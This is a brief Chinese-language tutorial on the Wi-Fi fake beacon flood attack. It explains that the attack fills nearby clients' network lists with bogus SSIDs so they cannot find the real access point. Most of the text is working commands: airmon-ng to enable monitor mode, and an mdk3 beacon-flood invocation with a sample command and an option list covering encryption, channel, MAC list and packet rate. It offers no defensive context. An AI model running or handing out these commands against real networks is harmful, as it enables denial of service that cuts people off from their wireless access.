假信标洪水攻击
-
假信标洪水攻击就是向无线信道中发送大量的虚假的SSID来充斥客户端的无线列表,使客户端找不到真实的AP。
-
使用MDK3攻击实施假信标攻击的方式如下:
airmon-ng start wlan0
开启无线网卡的监听模式:
ifconfig
查看网卡是否进入监听模式:
开展攻击:
mdk3 <interface> b <options>
例:
mdk3 wlan0mon b -w -g -t -m -c 6 -f /home/ronie/桌面/wifi.txt
- -n 自定义ESSID
- -f 读取ESSID文件列表
- -d 自定义为Ad-Hoc模式
- -w 自定义为WEP模式
- -g 自定义为54Mbit模式
- -t 使用wpa tkip加密
- -a 使用wpa ase加密
- -m 读取数据库中存放的mac地址
- -c 自定义信道
- -s 发包速率,默认50